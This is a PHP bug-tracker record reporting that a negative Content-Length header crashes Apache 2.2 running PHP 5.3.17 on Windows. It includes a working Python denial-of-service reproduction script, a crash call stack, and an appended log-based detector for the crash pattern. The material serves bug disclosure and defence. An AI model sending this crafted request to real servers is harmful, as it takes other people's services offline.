Edit report at https://bugs.php.net/bug.php?id=63200&edit=1

 ID:               63200
 Updated by:       php-bugs@lists.php.net
 Reported by:      chris at whyley dot com
 Summary:          Apache 2.2 crashes when PHP called with negative
                   Content-Length HTTP header
-Status:           Feedback
+Status:           No Feedback
 Type:             Bug
 Package:          Reproducible crash
 Operating System: Windows Server 2003
 PHP Version:      5.3.17

 New Comment:

No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Open". Thank you.


Previous Comments:
------------------------------------------------------------------------
[2012-10-05 10:26:01] chris at whyley dot com

I have not tested this issue under version 5.4 as my environment is set up for 5.3.17. Are you able to recreate it in 5.3.17?

It always crashes no matter what I have in index.php; in fact I can call any page and cause the crash to happen.

------------------------------------------------------------------------
[2012-10-05 04:26:26] larue...@php.net

I cannot reproduce this with 5.4, and from the backtrace, it seems to crash in another place.

So, is it related to your index.php? Does it always crash no matter what the index.php is?

------------------------------------------------------------------------
[2012-10-02 14:45:02] chris at whyley dot com

Description:
------------
Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following:

(1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf:

    ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate".

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size: instead of posting an accurate filesize for the Content-Length header they use a negative integer instead, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DoS attacks on vulnerable systems.

Test script:
---------------
#!/usr/bin/python
# Python 2 script from the report: opens one TCP connection and sends a single
# GET request whose Content-Length is negative, with Accept-Encoding set to
# "gzip, deflate", then disconnects without reading the response.
import socket, sys

target = "10.211.55.3"
port   = 80
request  = "GET / HTTP/1.1\n"
request += "Host: " + target + "\n"
request += "Accept-Encoding:    gzip, deflate\n"
request += "Content-Length: -1\n\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
except socket.error:
    print "[-] Connection to %s:%s failed!" % (target, port)
    sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.sendall(request)
s.close()

Expected result:
----------------
Stable Apache, no crash.

Actual result:
--------------
Thread 2 - System ID 3008
Entry point   msvcrt!_endthreadex+3a 
Create time   10/2/2012 2:29:08 PM 
Time spent in user mode   0 Days 0:0:0.0 
Time spent in kernel mode   0 Days 0:0:0.15 


Full Call Stack

Function     Arg 1     Arg 2     Arg 3     Arg 4   Source
php5ts!zend_hash_index_find+17     016f3460     0000000d     018ee6c0     00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985
php5ts!_zend_list_delete+27     0000000d     016b0150     029811c0     016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27
php5ts!_php_stream_free+ae     029811c0     00000003     016b0150     029811c0   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a
php5ts!php_zend_stream_mmap_closer+1a     029811c0     016b0150     0290a4e0     007339f4   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9
php5ts!zend_file_handle_dtor+2a     0290a4e8     016b0150     00000000     00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8
php5ts!file_handle_dtor+14     0290a4e8     018ee828     018ee798     00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b
php5ts!zend_llist_del_element+71     016b1754     018ee828     007d9810     016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36
php5ts!zend_destroy_file_handle+26     018ee828     016b0150     016b0150     016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 242
php5ts!zend_execute_scripts+c4     00000002     016b0150     00000000     00000001   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234
php5apache2_2!php_handler+64c     00fba200     006348e0     00fba200     00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 + 13
libhttpd!ap_run_handler+25     00fba200     6eed3de0     00fba200     00634f68
libhttpd!ap_invoke_handler+b0     00000000     00fb8938     018ee8f8     6ff0ef68
libhttpd!ap_internal_redirect+37     00634f68     00fb8938     00eb6c50     0000019d
libhttpd!ap_die+1e8     00fb8938     00000000     00000001     00fba118
libhttpd!ap_http_header_filter+9f     00fb96f8     00fba118     00fba118     018ee974
libhttpd!ap_pass_brigade+52     00fb96f8     00fba118     00000000     00fba118
libhttpd!ap_content_length_filter+a9     00fb96e0     00eb6cb0     00fb96c8     018ee9e0
libhttpd!ap_pass_brigade+52     00fb96e0     00fba118     6fba4309     00fba118
libhttpd!ap_byterange_filter+474     00fb96c8     00fba118     00fba060     018eea1c
libhttpd!ap_pass_brigade+52     00fb96c8     00fba118     00eb6cb0     00fba118
mod_deflate+1352     00fba060     00fba118     00fba0c0     018eea58
libhttpd!ap_pass_brigade+52     00fba060     00fba118     00fba080     00fba190
mod_deflate+1aa1     00fc5a48     00fba1b0     00fba190     018eea84
libhttpd!ap_pass_brigade+52     00fc5a48     00fba190     00fb9938     00fba190
libhttpd!ap_old_write_filter+5b     00fba080     00fba190     00fba190     018eeab4
libhttpd!ap_pass_brigade+52     00fba080     00fba190     00fb9878     00fba138
libhttpd!ap_set_etag+b28     00fba138     00fb9938     0000019d     6ff37324
libhttpd!ap_set_etag+2bb     00fba190     00fb9e08     00000000     00000000
libhttpd!ap_get_brigade+24     00fb9938     00fb9e08     00000000     00000000
php5apache2_2!php_apache_sapi_read_post+3d     018eeb68     00000f9f     00000f9f     016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 201 + 1a
php5ts!sapi_deactivate+6f     016b0150     016b0150     00000000     00fb8938   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\sapi.c @ 423 + d
php5ts!php_request_shutdown+3a6     00000000     00000004     00637170     00fb8938   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1670 + 6
php5apache2_2!php_handler+6b1     00fb8938     006348e0     00fb8938     00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 682
libhttpd!ap_run_handler+25     00fb8938     00fb8938     00fb8938     00000000
libhttpd!ap_invoke_handler+b0     00000000     00fb7958     018eff38     6ff0adbc
libhttpd!ap_die+29e     00fb8938     00000000     006535b0     00fb7958
libhttpd!ap_get_request_note+1d0c     00fb7958     00fb7958     00fb7958     00000001
libhttpd!ap_run_process_connection+25     00fb7958     005c4488     018eff80     6ff1df6c
libhttpd!ap_process_connection+33     00fb7958     00eb49f8     7c911086     00eb0448
libhttpd!ap_regkey_value_remove+c7c     00fb7950     7c911086     7c9101db     00ea2120
msvcrt!_endthreadex+a9     00ea2120     7c911086     7c9101db     00ea2120
kernel32!BaseThreadStart+37     77c3a341     00ea2120     00000000     00000000


Exception Information
PHP5TS!ZEND_HASH_INDEX_FIND+17
In httpd__PID__3560__Date__10_02_2012__Time_02_29_32PM__453__Second_Chance_Exception_C0000005.dmp the assembly instruction at php5ts!zend_hash_index_find+17 in C:\Core\PHP-5317\php5ts.dll from The PHP Group has caused an access violation exception (0xC0000005) when trying to read from memory location 0x0d3e2d2d on thread 2


------------------------------------------------------------------------
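The error_log excerpt in the report shows the trigger ("Invalid Content-Length" for a client) followed six seconds later by the child exiting with status 3221225477, which is 0xC0000005, the access violation named in the dump. The following detector is an added example (not code from the report or from PHP) that correlates those two events over Apache error_log lines so an operator can see which client is knocking over worker processes; the sample log is constructed from the report's lines plus two extra lines to show a non-match.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the two error_log lines quoted in the report, plus an
# unrelated notice and a second trigger that is not followed by a crash.
SAMPLE_LOG = """\
[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.
[Tue Oct 02 13:50:01 2012] [notice] Apache/2.2 configured -- resuming normal operations
[Tue Oct 02 14:10:40 2012] [error] [client 10.211.55.9] Invalid Content-Length
"""

LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?P<msg>.*)$")
CLIENT_RE = re.compile(r"\[client (?P<ip>[^\]]+)\] (?P<text>.*)")
EXIT_RE = re.compile(r"child process exited with status (?P<status>\d+)")
TS_FMT = "%a %b %d %H:%M:%S %Y"

# The Windows parent reports the child's NTSTATUS as a decimal exit status;
# 3221225477 == 0xC0000005, the access violation from the report's dump.
CRASH_STATUSES = {0xC0000005: "STATUS_ACCESS_VIOLATION"}

def parse_line(line):
    """Split one Apache 2.2 error_log line into (timestamp, level, message)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m.group("ts"), TS_FMT), m.group("level"), m.group("msg")

def find_crash_triggers(log_text, window=timedelta(seconds=30)):
    """Pair each 'Invalid Content-Length' error with a child crash that follows
    it within `window`; return a list of (client_ip, status_name) tuples."""
    pending = []   # (timestamp, client_ip) of recent bad Content-Length errors
    hits = []
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if not parsed:
            continue
        ts, _level, msg = parsed
        c = CLIENT_RE.match(msg)
        if c and c.group("text").startswith("Invalid Content-Length"):
            pending.append((ts, c.group("ip")))
            continue
        e = EXIT_RE.search(msg)
        if e:
            name = CRASH_STATUSES.get(int(e.group("status")))
            if name:
                hits.extend((ip, name) for t, ip in pending if ts - t <= window)
                pending = []   # each crash is attributed once
    return hits
```

Run against SAMPLE_LOG it attributes the single crash to 10.211.55.3 and leaves the later, crash-free error unflagged.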


